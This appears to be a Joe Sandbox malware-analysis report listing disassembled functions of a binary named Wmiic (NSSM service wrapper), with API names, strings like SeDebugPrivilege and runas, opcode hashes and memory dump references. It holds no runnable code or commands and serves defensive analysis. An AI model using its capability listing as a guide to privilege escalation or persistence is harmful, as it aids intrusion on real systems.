                                                                                                                                                                                                    • Associated: 0000001F.00000002.1888651556.0000000140065000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_31_2_140000000_Wmiic.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: FormatHandleMessageValueWindow_errno$AllocCloseConsoleDefaultLangLocalProcessServiceStationUser_snwprintf_s
                                                                                                                                                                                                    • String ID: %s$%s: %s$%s: %s: %s$AppThrottle
                                                                                                                                                                                                    • API String ID: 3091485450-1444196156
                                                                                                                                                                                                    • Opcode ID: ad12e137b0566e539ec48c87203486ce3c3dfc246e838f177d5758311995c6fa
                                                                                                                                                                                                    • Instruction ID: 6cfbc6d17aabad81b5b106fe63f1999e49cdb119c4a97786fe8d2ec62f0a0950
                                                                                                                                                                                                    • Opcode Fuzzy Hash: ad12e137b0566e539ec48c87203486ce3c3dfc246e838f177d5758311995c6fa
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 68B1A53160578582FA26AB63B5447EE67A1BB8CBC4F401029FF4A0B7B6EF3AC5158740
                                                                                                                                                                                                    Function 0000000140013D10 Relevance: 31.7, APIs: 14, Strings: 4, Instructions: 200sleepregistryserviceCOMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000001F.00000002.1888546922.0000000140001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                                                                    • Associated: 0000001F.00000002.1888531338.0000000140000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001F.00000002.1888574423.0000000140026000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001F.00000002.1888606077.0000000140030000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001F.00000002.1888606077.0000000140062000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001F.00000002.1888651556.0000000140065000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_31_2_140000000_Wmiic.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Service$ErrorEventLast$AllocCreateCriticalHeapInitializeProcessRegisterSectionSource$CloseCtrlCurrentDeregisterDisplayHandleHandlerLocalNameReportSleepStatusThreadTimerValueWaitable_snwprintf_s
                                                                                                                                                                                                    • String ID: NSSM$debug$service->name$service_main()
                                                                                                                                                                                                    • API String ID: 867767197-3121758583
                                                                                                                                                                                                    • Opcode ID: 232ef101459a34ba4e97bc38d354e551541c59c984acad53f48cefa515037594
                                                                                                                                                                                                    • Instruction ID: 391d97ab9eb6af0e6816f0a333b294f2bc5ca0cf5282711f4ea3fa88c4337364
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 232ef101459a34ba4e97bc38d354e551541c59c984acad53f48cefa515037594
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 43A18F71A04B8086F752DF37A8017DA77A0FB4D7C8F48062AAB598B3B5DF398905CB50
                                                                                                                                                                                                    Function 000000014000A180 Relevance: 21.1, APIs: 7, Strings: 5, Instructions: 82memoryCOMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000001F.00000002.1888546922.0000000140001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                                                                    • Associated: 0000001F.00000002.1888531338.0000000140000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001F.00000002.1888574423.0000000140026000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001F.00000002.1888606077.0000000140030000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001F.00000002.1888606077.0000000140062000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001F.00000002.1888651556.0000000140065000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_31_2_140000000_Wmiic.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Heap$FreeProcess$AllocCommandExecuteLineLocalShell_snwprintf_s_vfwprintf_p
                                                                                                                                                                                                    • String ID: "$GetCommandLine()$elevate()$p$runas
                                                                                                                                                                                                    • API String ID: 568333785-2664397508
                                                                                                                                                                                                    • Opcode ID: 783b1db419e6da8296bc21220930b56356767060dd0a3c5355d5f8fa1b9bd47e
                                                                                                                                                                                                    • Instruction ID: 2077ac3bbf38e24c34af6bbde4a8a7d20c8c22cec92f61cf467793f99d6e06a8
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 783b1db419e6da8296bc21220930b56356767060dd0a3c5355d5f8fa1b9bd47e
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 96315C71615B9582E7129B22B8047EA33A1F7897E4F404229FB69437E9DF3DC905C740
                                                                                                                                                                                                    Function 000000014000A810 Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 65threadCOMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000001F.00000002.1888546922.0000000140001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                                                                    • Associated: 0000001F.00000002.1888531338.0000000140000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001F.00000002.1888574423.0000000140026000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001F.00000002.1888606077.0000000140030000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001F.00000002.1888606077.0000000140062000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001F.00000002.1888651556.0000000140065000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_31_2_140000000_Wmiic.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: ThreadToken$AdjustCurrentOpenPrivileges$CloseErrorHandleImpersonateLastLookupPrivilegeSelfValue
                                                                                                                                                                                                    • String ID: SeDebugPrivilege
                                                                                                                                                                                                    • API String ID: 2095247420-2896544425
                                                                                                                                                                                                    • Opcode ID: 3e7152db20e3f8e3e4ac19a98164bd4134ace9dbb4197a0a704cf1b4ed9552ec
                                                                                                                                                                                                    • Instruction ID: 1f60dc984ff7cd1ee9279a057587273100a33775c52be9d20afd9c1c22f79b8e
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 3e7152db20e3f8e3e4ac19a98164bd4134ace9dbb4197a0a704cf1b4ed9552ec
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 42310672608B8482EB51DF26F44478AB7A0F789B94F400219F78A43AB8DF3CD549CB40
                                                                                                                                                                                                    Function 000000014000ACB0 Relevance: 16.6, APIs: 11, Instructions: 109processCOMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000001F.00000002.1888546922.0000000140001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                                                                    • Associated: 0000001F.00000002.1888531338.0000000140000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001F.00000002.1888574423.0000000140026000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001F.00000002.1888606077.0000000140030000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001F.00000002.1888606077.0000000140062000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001F.00000002.1888651556.0000000140065000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_31_2_140000000_Wmiic.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Event$ErrorLastSource$AllocCloseCreateDeregisterHandleLocalRegisterReportSnapshotToolhelp32Value
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 3638057332-0
                                                                                                                                                                                                    • Opcode ID: 736b111b100a646399828fc1beca10fc05defdbe9cab0c2b345cb83a7c5a2b91
                                                                                                                                                                                                    • Instruction ID: d4a25d63226701a5820217a3ec4a756d52cdc905e9f9b02ee8c88e4c8cc5a9cb
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 736b111b100a646399828fc1beca10fc05defdbe9cab0c2b345cb83a7c5a2b91
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 7F417E7261468086E781DB36F54079A77A1E78DBD4F400229FB9A97BA9EF3CC841CB40
                                                                                                                                                                                                    Function 0000000140018800 Relevance: 12.1, APIs: 8, Instructions: 67COMMONLIBRARYCODE
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000001F.00000002.1888546922.0000000140001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                                                                    • Associated: 0000001F.00000002.1888531338.0000000140000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001F.00000002.1888574423.0000000140026000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001F.00000002.1888606077.0000000140030000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001F.00000002.1888606077.0000000140062000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001F.00000002.1888651556.0000000140065000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_31_2_140000000_Wmiic.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: ExceptionFilterProcessUnhandled$CaptureContextCurrentDebuggerEntryFunctionLookupPresentTerminateUnwindVirtual
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 3778485334-0
                                                                                                                                                                                                    • Opcode ID: 2c73cabdacd67ecc1ab47cb5ea7a511d34c178d29615d86a7b68e056a520e744
                                                                                                                                                                                                    • Instruction ID: 68ad1d73d9e93cc6001284d5fa1a39834dd5386839cfa0cf077785c591060cfe
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 2c73cabdacd67ecc1ab47cb5ea7a511d34c178d29615d86a7b68e056a520e744
                                                                                                                                                                                                    • Instruction Fuzzy Hash: B231F231105F808AEB629B62F8543DA73A1F78C3D4F60452AEB8E43B75DF38C4948B00
                                                                                                                                                                                                    Function 0000000140023864 Relevance: 10.6, APIs: 7, Instructions: 138COMMONLIBRARYCODE
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000001F.00000002.1888546922.0000000140001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                                                                    • Associated: 0000001F.00000002.1888531338.0000000140000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001F.00000002.1888574423.0000000140026000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001F.00000002.1888606077.0000000140030000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001F.00000002.1888606077.0000000140062000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001F.00000002.1888651556.0000000140065000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_31_2_140000000_Wmiic.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: _errno$ByteCharErrorLastMultiWide
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 3895584640-0
                                                                                                                                                                                                    • Opcode ID: de36e9be98680906f13d6fdec89071b2ed5335f68037e9720c0431ee17c4b1d6
                                                                                                                                                                                                    • Instruction ID: c1f587e2613b7e2320280e204ff58a8efa348b9f757dde8eac3d56b3eb560925
                                                                                                                                                                                                    • Opcode Fuzzy Hash: de36e9be98680906f13d6fdec89071b2ed5335f68037e9720c0431ee17c4b1d6
                                                                                                                                                                                                    • Instruction Fuzzy Hash: D35186726047C04AF7729F66E0503EEB790E3897D0F588119F79947AE5DE78CC818B16
                                                                                                                                                                                                    Function 0000000140019CB4 Relevance: 7.6, APIs: 5, Instructions: 93COMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000001F.00000002.1888546922.0000000140001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                                                                    • Associated: 0000001F.00000002.1888531338.0000000140000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001F.00000002.1888574423.0000000140026000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001F.00000002.1888606077.0000000140030000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001F.00000002.1888606077.0000000140062000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001F.00000002.1888651556.0000000140065000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_31_2_140000000_Wmiic.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: _errno$DecodePointer
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 2310398763-0
                                                                                                                                                                                                    • Opcode ID: e0cda3e0a9685855bd5d47f415d7519a3ac5b8f32a93c0f4dcec5490e416f5e2
                                                                                                                                                                                                    • Instruction ID: 44ef4eb01c81118c6643f99bc6a2e946d05f9bc6aed31f978ef6c775e81dc10f
                                                                                                                                                                                                    • Opcode Fuzzy Hash: e0cda3e0a9685855bd5d47f415d7519a3ac5b8f32a93c0f4dcec5490e416f5e2
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 1631E332B1065442F3279B3BA5827EE6552A78C794F588219FB250FBFACF3AC441C700
                                                                                                                                                                                                    Function 000000014000A050 Relevance: 4.5, APIs: 3, Instructions: 38memoryCOMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000001F.00000002.1888546922.0000000140001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                                                                    • Associated: 0000001F.00000002.1888531338.0000000140000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001F.00000002.1888574423.0000000140026000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001F.00000002.1888606077.0000000140030000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001F.00000002.1888606077.0000000140062000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001F.00000002.1888651556.0000000140065000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_31_2_140000000_Wmiic.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: AllocateCheckFreeInitializeMembershipToken
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 3429775523-0
                                                                                                                                                                                                    • Opcode ID: 3be228cc09c29312831331bff11f0d4ef4207261988248bd0618be56e79fc0d1
                                                                                                                                                                                                    • Instruction ID: 48eee273634d74207520e7cdaf30b75688e279164638d9c4aace6fd17198c53c
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 3be228cc09c29312831331bff11f0d4ef4207261988248bd0618be56e79fc0d1
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 1211F872618B808AE752CB26F45434BBBE0F399784F54005AE7C987B69DB3DD109CF40
                                                                                                                                                                                                    Function 0000000140022410 Relevance: 53.8, APIs: 43, Instructions: 94COMMONLIBRARYCODE
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000001F.00000002.1888546922.0000000140001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                                                                    • Associated: 0000001F.00000002.1888531338.0000000140000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001F.00000002.1888574423.0000000140026000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001F.00000002.1888606077.0000000140030000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001F.00000002.1888606077.0000000140062000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001F.00000002.1888651556.0000000140065000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_31_2_140000000_Wmiic.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: free$ErrorFreeHeapLast_errno
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 1012874770-0
                                                                                                                                                                                                    • Opcode ID: 0b0a0ae3fdfc1ed0fa13838e4ad93de12d14e6b930d1803b0b0efe21a5381680
                                                                                                                                                                                                    • Instruction ID: 8d2492f42c3375f3df4473a04d93de8bff90f0277a39e01c48f8c640fe808fed
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 0b0a0ae3fdfc1ed0fa13838e4ad93de12d14e6b930d1803b0b0efe21a5381680
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 59417432A1158883FA57BB77C8563EC1320ABCAB84F444231BB5D6F6B7CEB5C8459360
                                                                                                                                                                                                    Function 0000000140008480 Relevance: 35.2, APIs: 17, Strings: 3, Instructions: 181timefilesleepCOMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000001F.00000002.1888546922.0000000140001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                                                                    • Associated: 0000001F.00000002.1888531338.0000000140000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001F.00000002.1888574423.0000000140026000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001F.00000002.1888606077.0000000140030000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001F.00000002.1888606077.0000000140062000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001F.00000002.1888651556.0000000140065000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_31_2_140000000_Wmiic.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: File$Time$System$Handle$CloseErrorLast$CompareCopyCreateInformationMovePointerSleep
                                                                                                                                                                                                    • String ID: CopyFile()$CreateFile()$MoveFile()
                                                                                                                                                                                                    • API String ID: 3228394015-381917562
                                                                                                                                                                                                    • Opcode ID: 01af08144f5c24a7e0f72f2537b02be2019094e1b56a6c29d558042bc7711969
                                                                                                                                                                                                    • Instruction ID: 2c5f9a746a650ff16cd0eb76c04cc0088810d3ecae15e8d67c050bf747509107
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 01af08144f5c24a7e0f72f2537b02be2019094e1b56a6c29d558042bc7711969
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 94713D72204B8186E762DB62F8507DAB3A4F789BD4F541119FF8943AB9DF78C948CB00
                                                                                                                                                                                                    Function 0000000140016190 Relevance: 35.2, APIs: 18, Strings: 2, Instructions: 169COMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000001F.00000002.1888546922.0000000140001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                                                                    • Associated: 0000001F.00000002.1888531338.0000000140000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001F.00000002.1888574423.0000000140026000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001F.00000002.1888606077.0000000140030000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001F.00000002.1888606077.0000000140062000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001F.00000002.1888651556.0000000140065000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_31_2_140000000_Wmiic.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                    • String ID: dependencies$native_set_dependongroup
                                                                                                                                                                                                    • API String ID: 0-409972118
                                                                                                                                                                                                    • Opcode ID: 739a02f57c687493ff17d25acbd0d647586937320d629fc731b6e7eb5aacb352
                                                                                                                                                                                                    • Instruction ID: 03521c866b4c7cfe6bf2b1022ff6480705ab1916cd7ea62ef3b9d3751cacd87a
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 739a02f57c687493ff17d25acbd0d647586937320d629fc731b6e7eb5aacb352
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 62716C71604B8082EA269B77B8143DA67A1FB8DBD4F044129FB99477B9DF3DC944CB40
                                                                                                                                                                                                    Function 00000001400150A0 Relevance: 24.7, APIs: 13, Strings: 1, Instructions: 188COMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000001F.00000002.1888546922.0000000140001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                                                                    • Associated: 0000001F.00000002.1888531338.0000000140000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001F.00000002.1888574423.0000000140026000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001F.00000002.1888606077.0000000140030000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001F.00000002.1888606077.0000000140062000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001F.00000002.1888651556.0000000140065000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_31_2_140000000_Wmiic.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Process$AffinityCurrentMask
                                                                                                                                                                                                    • String ID: All
                                                                                                                                                                                                    • API String ID: 1231390398-55916349
                                                                                                                                                                                                    • Opcode ID: eff96e4369339bbba2c319400aa00bee1043dd448a0f535bee212858d1ac3183
                                                                                                                                                                                                    • Instruction ID: 89333b989c272c6900fa0fe1462a190d1688c94fb8f165d787664ba4dc7caf2a
                                                                                                                                                                                                    • Opcode Fuzzy Hash: eff96e4369339bbba2c319400aa00bee1043dd448a0f535bee212858d1ac3183
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 1B716172204B80C1EA62EB63E4403DA63A5FB8DBD4F444125FF9E8B7A9EF38C5458700
                                                                                                                                                                                                    Function 000000014000BDB0 Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 121memoryregistryCOMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000001F.00000002.1888546922.0000000140001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                                                                    • Associated: 0000001F.00000002.1888531338.0000000140000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001F.00000002.1888574423.0000000140026000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001F.00000002.1888606077.0000000140030000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001F.00000002.1888606077.0000000140062000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001F.00000002.1888651556.0000000140065000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_31_2_140000000_Wmiic.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Heap$Event$ProcessSource$AllocDeregisterFreeQueryRegisterReportValue
                                                                                                                                                                                                    • String ID: get_string()
                                                                                                                                                                                                    • API String ID: 4130051898-896229945
                                                                                                                                                                                                    • Opcode ID: f432ba425df1c334af0d5d8bc6cf21bbf44c8f1dc0a7f0ab12c867f88ba37124
                                                                                                                                                                                                    • Instruction ID: e01773196815c225b165d9e20bffeedce6d82feaaa2e36e89eb2a6d238022399
                                                                                                                                                                                                    • Opcode Fuzzy Hash: f432ba425df1c334af0d5d8bc6cf21bbf44c8f1dc0a7f0ab12c867f88ba37124
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 9F416AB1204A8186F722DB63B8543EA6691F78DBC4F444028FF8943BBADF3CC5458B00
                                                                                                                                                                                                    Function 0000000140015580 Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 187memoryCOMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000001F.00000002.1888546922.0000000140001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                                                                    • Associated: 0000001F.00000002.1888531338.0000000140000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001F.00000002.1888574423.0000000140026000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001F.00000002.1888606077.0000000140030000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001F.00000002.1888606077.0000000140062000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001F.00000002.1888651556.0000000140065000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_31_2_140000000_Wmiic.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Heap$FreeProcess
                                                                                                                                                                                                    • String ID: AppEnvironment
                                                                                                                                                                                                    • API String ID: 3859560861-948859433
                                                                                                                                                                                                    • Opcode ID: bf727592a83bd657103b9efa741edc9865e88ac5b80f902545c4b4d6b6b03db5
                                                                                                                                                                                                    • Instruction ID: 1f537f8a4e15fb6a063128440b77b0ff2ca1e7455b8185a5c21f445aa25c8dd6
                                                                                                                                                                                                    • Opcode Fuzzy Hash: bf727592a83bd657103b9efa741edc9865e88ac5b80f902545c4b4d6b6b03db5
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 4871A676604A80C2EA62EB63B4443DA67A0FB8DBD5F544215FF998B6F8DF39C845C700
                                                                                                                                                                                                    Function 0000000140011840 Relevance: 21.1, APIs: 10, Strings: 2, Instructions: 129memorysynchronizationCOMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
